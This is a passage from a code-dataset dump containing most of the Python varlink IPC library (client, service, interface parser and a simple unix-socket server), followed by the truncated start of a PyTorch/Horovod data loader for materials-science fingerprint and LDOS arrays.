exception\"\"\"\n def __init__(self, interface):\n VarlinkError.__init__(self, {'error': 'org.varlink.service.InterfaceNotFound', 'parameters': {'interface': interface}})\n\nclass MethodNotFound(VarlinkError):\n \"\"\"The standardized varlink MethodNotFound error as a python exception\"\"\"\n def __init__(self, method):\n VarlinkError.__init__(self, {'error': 'org.varlink.service.MethodNotFound', 'parameters': {'method': method}})\n\nclass MethodNotImplemented(VarlinkError):\n \"\"\"The standardized varlink MethodNotImplemented error as a python exception\"\"\"\n def __init__(self, method):\n VarlinkError.__init__(self, {'error': 'org.varlink.service.MethodNotImplemented', 'parameters': {'method': method}})\n\nclass InvalidParameter(VarlinkError):\n \"\"\"The standardized varlink InvalidParameter error as a python exception\"\"\"\n def __init__(self, name):\n VarlinkError.__init__(self, {'error': 'org.varlink.service.InvalidParameter', 'parameters': {'parameter': name}})\n\nclass Client:\n \"\"\"Varlink client class.\n\n >>> from varlink import Client\n >>> client = Client(resolve_interface='io.systemd.journal')\n >>> print(client.get_interfaces()['io.systemd.journal'].get_description())\n # Query and monitor the log messages of a system.\n interface io.systemd.journal\n\n type Entry (cursor: string, time: string, message: string, process: string, priority: string)\n\n # Monitor the log. Returns the @initial_lines most recent entries in the\n # first reply and then continuously replies when new entries are available.\n method Monitor(initial_lines: int) -> (entries: Entry[])\n >>>\n >>> iface = client.open(\"io.systemd.journal\")\n\n iface now holds an object with all the varlink methods available.\n\n Do varlink method call with varlink arguments and a\n single varlink return struct wrapped in a namespace class:\n >>> ret = iface.Monitor(initial_lines=1)\n >>> ret\n namespace(entries=[namespace(cursor='s=[…]',\n message=\"req:1 'dhcp4-change' [wlp3s0][…]\", priority='critical',\n process='nm-dispatcher', time='2018-01-29 12:19:59Z')])\n >>> ret.entries[0].process\n 'nm-dispatcher'\n\n Do varlink method call with varlink arguments and a\n multiple return values in monitor mode, using the \"_more\" keyword:\n >>> for m in iface.Monitor(_more=True):\n >>> for e in m.entries:\n >>> print(\"%s: %s\" % (e.time, e.message))\n 2018-01-29 12:19:59Z: [system] Activating via systemd: service name='[…]\n 2018-01-29 12:19:59Z: Starting Network Manager Script Dispatcher Service...\n 2018-01-29 12:19:59Z: bound to 10.200.159.150 -- renewal in 1423 seconds.\n 2018-01-29 12:19:59Z: [system] Successfully activated service 'org.freedesktop.nm_dispatcher'\n 2018-01-29 12:19:59Z: Started Network Manager Script Dispatcher Service.\n 2018-01-29 12:19:59Z: req:1 'dhcp4-change' [wlp3s0]: new request (6 scripts)\n 2018-01-29 12:19:59Z: req:1 'dhcp4-change' [wlp3s0]: start running ordered scripts...\n\n \"_more\" is special to this python varlink binding. If \"_more=True\", then the method call does\n not return a normal namespace wrapped varlink return value, but a generator,\n which yields the return values and waits (blocks) for the service to return more return values\n in the generator's .__next__() call.\n \"\"\"\n def __init__(self, address=None, resolve_interface=None, resolver=None):\n \"\"\"Get the interface descriptions from a varlink service.\n\n Keyword arguments:\n address -- the exact address like \"unix:/run/org.varlink.resolver\"\n resolve_interface -- an interface name, which is resolved with the system wide resolver\n resolver -- the exact address of the resolver to be used to resolve the interface name\n\n Exceptions:\n ConnectionError - could not connect to the service or resolver\n \"\"\"\n self._interfaces = {}\n self._childpid = 0\n def _resolve_interface(interface, resolver):\n _iface = Client(resolver).open('org.varlink.resolver')\n _r = _iface.Resolve(interface)\n return _r['address']\n\n with open(os.path.join(os.path.dirname(__file__), 'org.varlink.service.varlink')) as f:\n interface = Interface(f.read())\n self.add_interface(interface)\n\n if address is None and not (resolve_interface is None):\n address = _resolve_interface(resolve_interface, resolver or \"unix:/run/org.varlink.resolver\")\n\n if address.startswith(\"unix:\"):\n address = address[5:]\n mode = address.rfind(';mode=')\n if mode != -1:\n address = address[:mode]\n if address[0] == '@':\n address = address.replace('@', '\\0', 1)\n elif address.startswith(\"exec:\"):\n executable = address[5:]\n s = socket.socket(socket.AF_UNIX)\n s.setblocking(0)\n s.bind(\"\")\n s.listen()\n address = s.getsockname().decode('ascii')\n\n self._childpid = os.fork()\n if self._childpid == 0:\n # child\n n = s.fileno()\n if n == 3:\n # without dup() the socket is closed with the python destructor\n n = os.dup(3)\n del s\n else:\n try:\n os.close(3)\n except OSError:\n pass\n\n os.dup2(n, 3)\n address = address.replace('\\0', '@', 1)\n address = \"unix:%s;mode=0600\" % address\n os.execlp(executable, executable, address)\n sys.exit(1)\n # parent\n s.close()\n else:\n # FIXME: also accept other transports\n raise ConnectionError\n\n self._childpid\n self.address = address\n siface = self.open(\"org.varlink.service\")\n info = siface.GetInfo()\n\n for iface in info['interfaces']:\n desc = siface.GetInterfaceDescription(iface)\n interface = Interface(desc['description'])\n self._interfaces[interface._name] = interface\n\n def __del__(self):\n if hasattr(self, '_childpid') and self._childpid != 0:\n try:\n os.kill(self._childpid, signal.SIGTERM)\n except OSError:\n pass\n os.waitpid(self._childpid, 0)\n\n def open(self, interface_name, namespaced = False):\n \"\"\"Open a new connection and get a client interface handle with the varlink methods installed.\n\n Arguments:\n interface_name -- an interface name, which the service this client object is\n connected to, provides.\n\n Exceptions:\n InterfaceNotFound -- if the interface is not found\n ConnectionError -- could not connect to the service\n \"\"\"\n\n if not interface_name in self._interfaces:\n raise InterfaceNotFound(interface_name)\n\n try:\n s = socket.socket(socket.AF_UNIX)\n s.setblocking(1)\n s.connect(self.address)\n except:\n raise ConnectionError\n\n return ClientInterfaceProxy(self._interfaces[interface_name], s, namespaced = namespaced)\n\n def get_interfaces(self):\n \"\"\"Returns the a list of Interface objects the service implements.\"\"\"\n return self._interfaces\n\n def add_interface(self, interface):\n \"\"\"Manually add or overwrite an interface definition from an Interface object.\n\n Argument:\n interface - an Interface() object\n \"\"\"\n if not isinstance(interface, Interface):\n raise TypeError\n\n self._interfaces[interface._name] = interface\n\nclass Service:\n \"\"\"Varlink service server handler\n\n To use the Service, a global object is instantiated:\n service = varlink.Service(\n vendor='Red Hat',\n product='Manage System Accounts',\n version='1',\n interface_dir=os.path.dirname(__file__)\n )\n\n\n For the class implementing the methods of a specific varlink interface\n a decorator is used:\n @service.interface('com.redhat.system.accounts')\n class Accounts:\n […]\n\n The varlink file corresponding to this interface is loaded from the 'interface_dir'\n specified in the constructor of the Service. It has to end in '.varlink'.\n\n Split the incoming stream for every null byte and feed it to the service.handle()\n function. Write any message returned from this generator function to the output stream.\n for outgoing_message in service.handle(incoming_message):\n connection.write(outgoing_message)\n\n or see, how the SimpleServer handles the Service object:\n SimpleServer(service).serve(sys.argv[1], listen_fd=listen_fd)\n\n Note: varlink only handles one method call at a time on one connection.\n\n \"\"\"\n def __init__(self, vendor='', product='', version='', interface_dir='.', namespaced=False):\n \"\"\"Initialize the service with the data org.varlink.service.GetInfo() returns\n\n Arguments:\n interface_dir -- the directory with the *.varlink files for the interfaces\n \"\"\"\n self.vendor = vendor\n self.product = product\n self.version = version\n self.interface_dir = interface_dir\n self._namespaced = namespaced\n\n self.url = None\n self.interfaces = {}\n directory = os.path.dirname(__file__)\n self._add_interface(os.path.join(directory, 'org.varlink.service.varlink'), self)\n\n def GetInfo(self):\n \"\"\"The standardized org.varlink.service.GetInfo() varlink method.\"\"\"\n return {\n 'vendor': self.vendor,\n 'product': self.product,\n 'version': self.version,\n 'url': self.url,\n 'interfaces': list(self.interfaces.keys())\n }\n\n def GetInterfaceDescription(self, interface):\n \"\"\"The standardized org.varlink.service.GetInterfaceDescription() varlink method.\"\"\"\n try:\n i = self.interfaces[interface]\n except KeyError:\n raise InterfaceNotFound(interface)\n\n return {'description': i._description}\n\n def _handle(self, message):\n try:\n interface_name, _, method_name = message.get('method', '').rpartition('.')\n if not interface_name or not method_name:\n raise InterfaceNotFound(interface_name)\n\n interface = self.interfaces.get(interface_name)\n if not interface:\n raise InterfaceNotFound(interface_name)\n\n method = interface.get_method(method_name)\n\n parameters = message.get('parameters', {})\n for name in parameters:\n if name not in method.in_type.fields:\n raise InvalidParameter(name)\n if self._namespaced:\n parameters[name] = json.loads(json.dumps(parameters[name]), object_hook=lambda d: SimpleNamespace(**d))\n\n func = getattr(interface._handler, method_name, None)\n if not func or not callable(func):\n raise MethodNotImplemented(method_name)\n\n\n kwargs = {}\n if message.get('more', False) or message.get('oneway', False) or message.get('upgrade', False):\n sig = signature(func)\n if message.get('more', False) and '_more' in sig.parameters:\n kwargs[\"_more\"] = True\n\n if message.get('oneway', False) and '_oneway' in sig.parameters:\n kwargs[\"_oneway\"] = True\n\n if message.get('upgrade', False) and '_upgrade' in sig.parameters:\n kwargs[\"_upgrade\"] = True\n\n out = func(**parameters, **kwargs)\n\n if isinstance(out, GeneratorType):\n try:\n for o in out:\n if isinstance(o, Exception):\n raise o\n\n if kwargs.get(\"_oneway\", False):\n return\n\n cont = True\n if '_continues' in o:\n cont = o['_continues']\n del o['_continues']\n yield { 'continues': bool(cont), 'parameters': o or {}}\n else:\n yield { 'parameters': o or {}}\n\n if not cont:\n return\n except ConnectionError as e:\n out.throw(e)\n else:\n yield {'parameters': out or {}}\n\n except VarlinkError as error:\n return error\n except Exception as error:\n traceback.print_exception(type(error), error, error.__traceback__)\n return {'error': 'InternalError'}\n\n def handle(self, message):\n \"\"\"This generator function handles any incoming message. Write any returned bytes to the output stream.\n\n for outgoing_message in service.handle(incoming_message):\n connection.write(outgoing_message)\n \"\"\"\n if not message:\n return\n\n if message[-1] == 0:\n message = message[:-1]\n\n for out in self._handle(json.loads(message)):\n yield json.dumps(out, cls=VarlinkEncoder).encode('utf-8') + b'\\0'\n\n def _add_interface(self, filename, handler):\n if not os.path.isabs(filename):\n filename = os.path.join(self.interface_dir, filename + '.varlink')\n\n with open(filename) as f:\n interface = Interface(f.read())\n interface._handler = handler\n self.interfaces[interface._name] = interface\n\n def interface(self, filename):\n def decorator(interface_class):\n self._add_interface(filename, interface_class())\n return interface_class\n\n return decorator\n\nclass Interface:\n \"\"\"Class for a parsed varlink interface definition.\"\"\"\n def __init__(self, description):\n \"\"\"description -- description string in varlink interface definition language\"\"\"\n self._description = description\n\n scanner = Scanner(description)\n scanner.expect('interface')\n self._name = scanner.expect('interface-name')\n self._members = collections.OrderedDict()\n while not scanner.end():\n member = scanner.read_member()\n self._members[member.name] = member\n\n def get_description(self):\n \"\"\"return the description string in varlink interface definition language\"\"\"\n return self._description\n\n def get_method(self, name):\n method = self._members.get(name)\n if method and isinstance(method, _Method):\n return method\n raise MethodNotFound(name)\n\n def filter_params(self, vtype, args, kwargs):\n if isinstance(vtype, _CustomType):\n return self.filter_params(self._members.get(vtype.name), args, kwargs)\n\n if isinstance(vtype, _Alias):\n return self.filter_params(self._members.get(vtype.type), args, kwargs)\n\n if isinstance(vtype, _Array):\n return [self.filter_params(vtype.element_type, x, None) for x in args]\n\n if not isinstance(vtype, _Struct):\n return args\n\n out = {}\n\n mystruct = None\n if not isinstance(args, tuple):\n mystruct = args\n args = None\n\n for name in vtype.fields:\n if isinstance(args, tuple):\n if args:\n val = args[0]\n if len(args) > 1:\n args = args[1:]\n else:\n args = None\n out[name] = self.filter_params(vtype.fields[name], val, None)\n continue\n else:\n if name in kwargs:\n out[name] = self.filter_params(vtype.fields[name], kwargs[name], None)\n continue\n\n if mystruct:\n try:\n if isinstance(mystruct, dict):\n val = mystruct[name]\n else:\n val = getattr(mystruct, name)\n out[name] = self.filter_params(vtype.fields[name], val, None)\n except:\n pass\n\n return out\n\nclass Scanner:\n \"\"\"Class for scanning a varlink interface definition.\"\"\"\n def __init__(self, string):\n self.whitespace = re.compile(r'([ \\t\\n]|#.*$)+', re.ASCII | re.MULTILINE)\n # FIXME: nested ()\n self.method_signature = re.compile(r'([ \\t\\n]|#.*$)*(\\([^)]*\\))([ \\t\\n]|#.*$)*->([ \\t\\n]|#.*$)*(\\([^)]*\\))', re.ASCII | re.MULTILINE)\n\n self.keyword_pattern = re.compile(r'\\b[a-z]+\\b|[:,(){}]|->|\\[\\]', re.ASCII)\n self.patterns = {\n 'interface-name': re.compile(r'[a-z]+(\\.[a-z0-9][a-z0-9-]*)+'),\n 'member-name': re.compile(r'\\b[A-Z][A-Za-z0-9_]*\\b', re.ASCII),\n 'identifier': re.compile(r'\\b[A-Za-z0-9_]+\\b', re.ASCII),\n }\n\n self.string = string\n self.pos = 0\n\n def get(self, expected):\n m = self.whitespace.match(self.string, self.pos)\n if m:\n self.pos = m.end()\n\n pattern = self.patterns.get(expected)\n if pattern:\n m = pattern.match(self.string, self.pos)\n if m:\n self.pos = m.end()\n return m.group(0)\n else:\n m = self.keyword_pattern.match(self.string, self.pos)\n if m and m.group(0) == expected:\n self.pos = m.end()\n return True\n\n def expect(self, expected):\n value = self.get(expected)\n if not value:\n raise SyntaxError('expected {}'.format(expected))\n return value\n\n def end(self):\n m = self.whitespace.match(self.string, self.pos)\n if m:\n self.pos = m.end()\n\n return self.pos >= len(self.string)\n\n def read_type(self):\n if self.get('bool'):\n t = bool()\n elif self.get('int'):\n t = int()\n elif self.get('float'):\n t = float()\n elif self.get('string'):\n t = str()\n else:\n name = self.get('member-name')\n if name:\n t = _CustomType(name)\n else:\n t = self.read_struct()\n\n if self.get('[]'):\n t = _Array(t)\n\n return t\n\n def read_struct(self):\n self.expect('(')\n fields = collections.OrderedDict()\n if not self.get(')'):\n while True:\n name = self.expect('identifier')\n self.expect(':')\n fields[name] = self.read_type()\n if not self.get(','):\n break\n self.expect(')')\n\n return _Struct(fields)\n\n def read_member(self):\n if self.get('type'):\n return _Alias(self.expect('member-name'), self.read_type())\n elif self.get('method'):\n name = self.expect('member-name')\n # FIXME\n sig = self.method_signature.match(self.string, self.pos)\n if sig:\n sig = name + sig.group(0)\n in_type = self.read_struct()\n self.expect('->')\n out_type = self.read_struct()\n return _Method(name, in_type, out_type, sig)\n elif self.get('error'):\n return _Error(self.expect('member-name'), self.read_type())\n else:\n raise SyntaxError('expected type, method, or error')\n\nclass _Struct:\n def __init__(self, fields):\n self.fields = collections.OrderedDict(fields)\n\nclass _Array:\n def __init__(self, element_type):\n self.element_type = element_type\n\nclass _CustomType:\n def __init__(self, name):\n self.name = name\n\nclass _Alias:\n def __init__(self, name, varlink_type):\n self.name = name\n self.type = varlink_type\n\nclass _Method:\n def __init__(self, name, in_type, out_type, signature):\n self.name = name\n self.in_type = in_type\n self.out_type = out_type\n self.signature = signature\n\nclass _Error:\n def __init__(self, name, varlink_type):\n self.name = name\n self.type = varlink_type\n\nclass ClientInterfaceProxy:\n \"\"\"A varlink client for an interface doing send/write and receive/read on a socket or file stream\"\"\"\n def __init__(self, interface, file_or_socket, namespaced = False):\n \"\"\"Creates an object with the varlink methods of an interface installed.\n\n The object allows to talk to a varlink service, which implements the specified interface\n transparently by calling the methods. The call blocks until enough messages are received.\n\n For monitor calls with '_more=True' a generator object is returned.\n\n Arguments:\n interface - an Interface object\n file_or_socket - an open socket or io stream\n namespaced - if True, varlink methods return SimpleNamespace objects instead of dictionaries\n \"\"\"\n self._interface = interface\n self._connection = file_or_socket\n\n if hasattr(self._connection, 'sendall'):\n self._sendall = True\n else:\n if not hasattr(self._connection, 'write'):\n raise TypeError\n self._sendall = False\n\n if hasattr(self._connection, 'recv'):\n self._recv = True\n else:\n if not hasattr(self._connection, 'read'):\n raise TypeError\n self._recv = False\n\n self._in_use = False\n self._in_buffer = b''\n\n self._namespaced = namespaced\n\n for member in interface._members.values():\n if isinstance(member, _Method):\n self._add_method(member)\n\n def _add_method(self, method):\n def _wrapped(*args, **kwds):\n if \"_more\" in kwds and kwds.pop(\"_more\"):\n return self._call_more(method.name, *args, **kwds)\n else:\n return self._call(method.name, *args, **kwds)\n _wrapped.__name__ = method.name\n # FIXME: add comments\n _wrapped.__doc__ = \"Varlink call: \" + method.signature\n setattr(self, method.name, _wrapped)\n\n def _send(self, out):\n if self._sendall:\n self._connection.sendall(json.dumps(out, cls=VarlinkEncoder).encode('utf-8') + b'\\0')\n elif hasattr:\n self._connection.write(json.dumps(out, cls=VarlinkEncoder).encode('utf-8') + b'\\0')\n\n def _next(self):\n while True:\n message, _, self._in_buffer = self._in_buffer.partition(b'\\0')\n if message:\n return message\n\n if self._recv:\n data = self._connection.recv(8192)\n else:\n data = self._connection.read(8192)\n\n if len(data) == 0:\n raise ConnectionError\n self._in_buffer += data\n\n def _nextMessage(self):\n message = self._next()\n if self._namespaced:\n message = json.loads(message, object_hook=lambda d: SimpleNamespace(**d))\n if hasattr(message, \"error\"):\n raise VarlinkError(message, self._namespaced)\n else:\n return (message.parameters, hasattr(message, \"continues\") and message.continues)\n else:\n message = json.loads(message)\n if 'error' in message:\n raise VarlinkError(message, self._namespaced)\n else:\n return (message['parameters'], ('continues' in message) and message['continues'])\n\n\n def _call(self, method_name, *args, **kwargs):\n if self._in_use:\n raise ConnectionError\n\n method = self._interface.get_method(method_name)\n\n sparam = self._interface.filter_params(method.in_type, args, kwargs)\n out = {'method' : self._interface._name + \".\" + method_name, 'parameters' : sparam}\n self._send(out)\n\n self._in_use = True\n (ret, more) = self._nextMessage()\n if more:\n self._connection.close()\n self._in_use = False\n raise ConnectionError\n self._in_use = False\n return ret\n\n def _call_more(self, method_name, *args, **kwargs):\n if self._in_use:\n raise ConnectionError\n\n method = self._interface.get_method(method_name)\n\n sparam = self._interface.filter_params(method.in_type, args, kwargs)\n out = {'method' : self._interface._name + \".\" + method_name, 'more' : True, 'parameters' : sparam}\n self._send(out)\n\n more = True\n self._in_use = True\n while True:\n (ret, more) = self._nextMessage()\n yield ret\n if not more:\n break\n self._in_use = False\n\n# Used by the SimpleServer\nclass _Connection:\n def __init__(self, _socket):\n self._socket = _socket\n self._in_buffer = b''\n self._out_buffer = b''\n\n def close(self):\n self._socket.close()\n\n def events(self):\n events = 0\n if len(self._in_buffer) < (8 * 1024 * 1024):\n events |= select.EPOLLIN\n if self._out_buffer:\n events |= select.EPOLLOUT\n return events\n\n def dispatch(self, events):\n if events & select.EPOLLOUT:\n n = self._socket.send(self._out_buffer[:8192])\n self._out_buffer = self._out_buffer[n:]\n\n if events & select.EPOLLIN:\n data = self._socket.recv(8192)\n if len(data) == 0:\n raise ConnectionError\n self._in_buffer += data\n\n def read(self):\n while True:\n message, _, self._in_buffer = self._in_buffer.partition(b'\\0')\n if message:\n yield message\n else:\n break\n\n def write(self, message):\n self._out_buffer += message\n\nclass SimpleServer:\n \"\"\"A simple single threaded unix domain socket server\n\n calls service.handle(message) for every zero byte separated incoming message\n and writes any return message from this generator function to the outgoing stream.\n\n Better use a framework like twisted to serve.\n \"\"\"\n def __init__(self, service):\n self._service = service\n self.connections = {}\n self._more = {}\n\n def serve(self, address, listen_fd=None):\n if listen_fd:\n s = socket.fromfd(listen_fd, socket.AF_UNIX, socket.SOCK_STREAM)\n else:\n if address[0] == '@':\n address = address.replace('@', '\\0', 1)\n\n s = socket.socket(socket.AF_UNIX)\n s.setblocking(0)\n s.bind(address)\n s.listen()\n\n epoll = select.epoll()\n epoll.register(s, select.EPOLLIN)\n\n while True:\n for fd, events in epoll.poll():\n if fd == s.fileno():\n sock, _ = s.accept()\n sock.setblocking(0)\n connection = _Connection(sock)\n self.connections[sock.fileno()] = connection\n epoll.register(sock.fileno(), select.EPOLLIN)\n else:\n connection = self.connections.get(fd)\n try:\n connection.dispatch(events)\n\n if not fd in self._more:\n for message in connection.read():\n # Let the varlink service handle this\n it = iter(self._service.handle(message))\n if isinstance(it, GeneratorType):\n self._more[fd] = it\n else:\n raise TypeError\n\n if fd in self._more:\n try:\n reply = next(self._more[fd])\n if reply != None:\n # write any reply pending\n connection.write(reply)\n except StopIteration:\n del self._more[fd]\n except ConnectionError as e:\n epoll.unregister(fd)\n connection.close()\n if fd in self._more:\n try:\n self._more[fd].throw(ConnectionError())\n except StopIteration:\n pass\n del self._more[fd]\n continue\n except Exception as error:\n traceback.print_exception(type(error), error, error.__traceback__)\n sys.exit(1)\n\n epoll.modify(fd, connection.events())\n\n s.close()\n epoll.close()\n\n","sub_path":"varlink/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":30607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"42569245","text":"# FP LDOS, Data Loaders\n\nimport os, sys\nimport numpy as np\n#import torch.nn as nn\n#import torch.nn.functional as F\n\n#import torch.utils.Dataset\nimport torch.utils.data.distributed\nimport torch.utils.data\nimport torch.utils\nimport horovod.torch as hvd\n\n#sys.path.append(\"./charm/\")\n#import charm.big_data\n\n###-----------------------------------------------------------------------###\n\n# Big Data Dataset\n#class Big_Dataset(torch.utils.data.Dataset):\n#\n# def __init__(self, args, data_name):\n#\n# fp_data_paths = []\n# ldos_data_paths = []\n#\n# if (data_name == \"train\"):\n# if (hvd.rank() == 0):\n# print(\"Creating Big Data Train Dataset\")\n#\n# # Start at snapshot 0\n# self.num_snapshots = args.num_snapshots - 2\n# snapshot = 0\n#\n# elif (data_name == \"validation\"):\n# if (hvd.rank() == 0):\n# print(\"Creating Big Data Validation Dataset\")\n#\n# # 2nd to last snapshot in the set of num_snapshots\n# self.num_snapshots = 1\n# snapshot = args.num_snapshots - 2\n#\n# elif (data_name == \"test\"):\n# if (hvd.rank() == 0):\n# print(\"Creating Big Data Test Dataset\")\n#\n# # Last snapshot in the set of num_snapshots\n# self.num_snapshots = 1\n# snapshot = args.num_snapshots - 1\n# else:\n# if (hvd.rank() == 0):\n# print(\"\\nInvalid Big Datset. Options are ['train', 'validation', or 'test'].\\n\\n\")\n# exit(0);\n#\n# fp_head = \"/%s/%sgcc/%s_fp_%dx%dx%dgrid_%dcomps\" % \\\n# (args.temp, args.gcc, args.material, \\\n# args.nxyz, args.nxyz, args.nxyz, args.fp_length)\n# ldos_head = \"/%s/%sgcc/%s_ldos_%dx%dx%dgrid_%delvls\" % \\\n# (args.temp, args.gcc, args.material, \\\n# args.nxyz, args.nxyz, args.nxyz, args.ldos_length)\n#\n#\n#\n# for i in range(self.num_snapshots):\n# fp_data_paths.append(args.fp_dir + fp_head + \\\n# \"_snapshot%d.npy\" % (snapshot + i))\n# ldos_data_paths.append(args.ldos_dir + ldos_head + \\\n# \"_snapshot%d.npy\" % (snapshot + i))\n# \n# # List of numpy arrays to preserve mmap_mode\n# self.fp_dataset = [] \n# self.ldos_dataset = []\n#\n# # Load Datasets\n# for idx, path in enumerate(fp_data_paths):\n# self.fp_dataset.append(np.load(path, mmap_mode=\"r\"))\n# for idx, path in enumerate(ldos_data_paths):\n# self.ldos_dataset.append(np.load(path, mmap_mode=\"r\"))\n#\n# # FP subset and reshape\n# fp_idxs = subset_fp(args)\n# for i in range(len(self.fp_dataset)):\n# self.fp_dataset[i] = self.fp_dataset[i][:,:,:,fp_idxs]\n#\n# data_shape = self.fp_dataset[i].shape \n#\n# grid_pts = data_shape[0] * data_shape[1] * data_shape[2]\n#\n# self.fp_dataset[i] = np.reshape(self.fp_dataset[i], [grid_pts, data_shape[3]])\n#\n# self.fp_dataset[i] = self.fp_dataset[i]\n#\n# # !!! Need to modify !!! \n# # Switch args.fp_length -> args.fp_length and args.final_fp_length \n# if (data_name == \"test\"):\n# args.fp_length = data_shape[-1]\n#\n#\n# # LDOS subset and reshape\n# ldos_idxs = subset_ldos(args)\n# for i in range(len(self.ldos_dataset)):\n# self.ldos_dataset[i] = self.ldos_dataset[i][:,:,:,ldos_idxs]\n#\n# data_shape = self.ldos_dataset[i].shape \n#\n# grid_pts = data_shape[0] * data_shape[1] * data_shape[2]\n#\n# self.ldos_dataset[i] = np.reshape(self.ldos_dataset[i], [grid_pts, data_shape[3]])\n# \n# self.ldos_dataset[i] = self.ldos_dataset[i]\n#\n# # !!! Need to modify !!! \n# # Switch args.ldos_length -> args.ldos_length and args.final_ldos_length \n# if (data_name == \"test\"):\n# args.ldos_length = data_shape[-1]\n# args.grid_pts = grid_pts\n#\n# self.grid_pts = grid_pts\n#\n# # Consistency Checks\n# if (len(self.fp_dataset) != len(self.ldos_dataset)):\n# if (hvd.rank() == 0):\n# print(\"\\nError. Num snapshots for fp and ldos inconsistent.\\n\\n\")\n# exit(0);\n#\n# for i in range(len(self.fp_dataset)):\n# if (self.fp_dataset[i].shape[0] != self.ldos_dataset[i].shape[0]):\n# if (hvd.rank() == 0):\n# print(\"\\nError. Snapshot %d, FP and LDOS dataset have different number of data points.\\n\\n\" % i)\n# exit(0);\n#\n# if (self.fp_dataset[0].shape[-1] != self.fp_dataset[i].shape[-1]):\n# if (hvd.rank() == 0):\n# print(\"\\nError. Snapshot %d, Fingerprint lengths are not consistent between snapshots.\\n\\n\" % i)\n# exit(0);\n# \n# if (self.ldos_dataset[0].shape[-1] != self.ldos_dataset[i].shape[-1]):\n# if (hvd.rank() == 0):\n# print(\"\\nError. Snapshot %d, LDOS lengths are not consistent between snapshots.\\n\\n\" % i)\n# exit(0);\n#\n#\n#\n# # Fetch a sample\n# def __getitem__(self, idx):\n# \n## print(\"idx: \", idx)\n#\n# return torch.tensor(self.fp_dataset[idx // self.grid_pts][idx % self.grid_pts, :]).float(), \\\n# torch.tensor(self.ldos_dataset[idx // self.grid_pts][idx % self.grid_pts, :]).float()\n#\n## print(\"input shape: \", t1.shape)\n## print(\"output shape: \", t2.shape)\n#\n#\n## return t1, t2\n#\n#\n# # Number of samples in dataset\n# def __len__(self):\n# return self.num_snapshots * self.grid_pts\n#\n\n###-----------------------------------------------------------------------###\n\n# Compressed Dataset\n#class Compressed_Dataset(torch.utils.data.Dataset):\n#\n# def __init__(self, args, data_name, fp_data, ldos_data):\n#\n# if (hvd.rank() == 0):\n# print(\"Creating Big Compressed Dataset:\")\n#\n# self.args = args\n# self.sample = 0\n# \n# if (args.load_encoder):\n# self.encoder = 0\n# else:\n#\n# args.fp_length = fp_data.shape[1]\n#\n# self.num_subdim = 2\n# self.ks = 256\n#\n# if (args.fp_length % self.num_subdim != 0):\n# print(\"\\n\\nPQKMeans division error. %d not a factor of %d. Exiting!\\n\" % (self.num_subdim, args.fp_length))\n# exit(0)\n#\n# self.pqkmeans.encoder.PQEncoder(num_subdim=self.num_subdim, Ks=self.ks\n#\n# sample_pts = fp_data.shape[0] * args.compress_fit_ratio\n#\n# if (hvd.rank() == 0):\n# print(\"Begin fitting encoder to subset of data\")\n# \n# tic = timeit.default_timer()\n# self.encoder.fit(fp_data[:sample_pts])\n# toc = timeit.default_timer()\n#\n# if (hvd.rank() == 0):\n# print(\"Fit %d samples to %s dataset encoder: %4.4fs\" % (sample_pts, data_name, toc - tic))\n# \n# tic\n#\n# fp_encode = encoder.transform(fp_data)\n# \n#\n# self\n#\n#\n#\n#\n# self.cluster_ids = []\n#\n# for i in range(args.clusters):\n# self.cluster_ids.append()\n#\n# \n#\n# def __getitem__(self, idx):\n#\n# \n#\n# return 0;\n#\n# def __len__(self):\n# return 1;\n\n\n\n\n###-----------------------------------------------------------------------###\n\n#\n# RANDOM Dataset\n#\n\ndef load_data_random(args):\n# args.fp_length = 116\n# args.ldos_length = 128\n# args.dens_length = 1\n# args.lstm_in_length = 10\n\n if (hvd.rank() == 0):\n print(\"Begin Load Data for RANDOM\")\n \n args.grid_pts = args.nxyz ** 3\n\n train_pts = int(args.grid_pts * args.train_test_split)\n validation_pts = int((args.grid_pts - train_pts) / 2.0)\n test_pts = args.grid_pts - train_pts - validation_pts\n\n\n ldos_random_torch = \\\n torch.tensor(np.random.rand(args.grid_pts, args.ldos_length), \\\n dtype=torch.float32)\n \n fp_random_torch = \\\n torch.tensor(np.random.rand(args.grid_pts, args.fp_length), \\\n dtype=torch.float32)\n\n fp_ldos_dataset = \\\n torch.utils.data.TensorDataset(fp_random_torch, ldos_random_torch)\n\n train_dataset, validation_dataset, test_dataset = \\\n torch.utils.data.random_split(fp_ldos_dataset, \\\n [train_pts, validation_pts, test_pts])\n\n return (train_dataset, validation_dataset, test_dataset)\n\n\n###-----------------------------------------------------------------------###\n\n#\n# FP_LDOS Dataset\n#\n\ndef load_data_fp_ldos(args):\n\n if (hvd.rank() == 0):\n print(\"Begin Load Data for FP_LDOS\")\n\n # Currently use \n # 1 snapshot for validation, \n # 1 snapshot for test, \n # and the rest for training.\n args.test_snapshot = args.num_snapshots - 1;\n args.validation_snapshot = args.num_snapshots - 2;\n args.num_train_snapshots = args.num_snapshots - 2;\n\n if (args.num_train_snapshots < 1):\n args.num_train_snapshots = 1\n if (args.validation_snapshot < 0):\n args.validation_snapshot = 0\n\n # If using water dataset\n if (args.water):\n args.fp_data_fpath = \"/%s/%sgcc/~~~~~~~~\" % (args.temp, args.gcc)\n args.ldos_data_fpath = \"/%s/%sgcc/~~~~~~~~\" % (args.temp, args.gcc)\n\n print(\"\\n\\nFor Josh, water case.\\n\\n\")\n exit(0);\n\n # If using Material (Al) dataset\n else:\n args.fp_data_fpath = \"/%s/%sgcc/%s_fp_%dx%dx%dgrid_%dcomps\" % \\\n (args.temp, args.gcc, args.material, args.nxyz, args.nxyz, args.nxyz, args.fp_length)\n args.ldos_data_fpath = \"/%s/%sgcc/%s_ldos_%dx%dx%dgrid_%delvls\" % \\\n (args.temp, args.gcc, args.material, args.nxyz, args.nxyz, args.nxyz, args.ldos_length)\n\n # Get dimensions of fp/ldos numpy arrays \n empty_fp_np = np.load(args.fp_dir + args.fp_data_fpath + \\\n \"_snapshot%d.npy\" % (0), mmap_mode='r')\n empty_ldos_np = np.load(args.ldos_dir + args.ldos_data_fpath + \\\n \"_snapshot%d.npy\" % (0), mmap_mode='r')\n\n fp_shape = empty_fp_np.shape\n ldos_shape = empty_ldos_np.shape\n\n # Create empty np arrays to store all train snapshots \n # (FP(input) and LDOS(output)) \n full_train_fp_np = \\\n np.empty(np.insert(fp_shape, 0, args.num_train_snapshots))\n full_train_ldos_np = \\\n np.empty(np.insert(ldos_shape, 0, args.num_train_snapshots))\n\n if (hvd.rank() == 0):\n print(\"Original 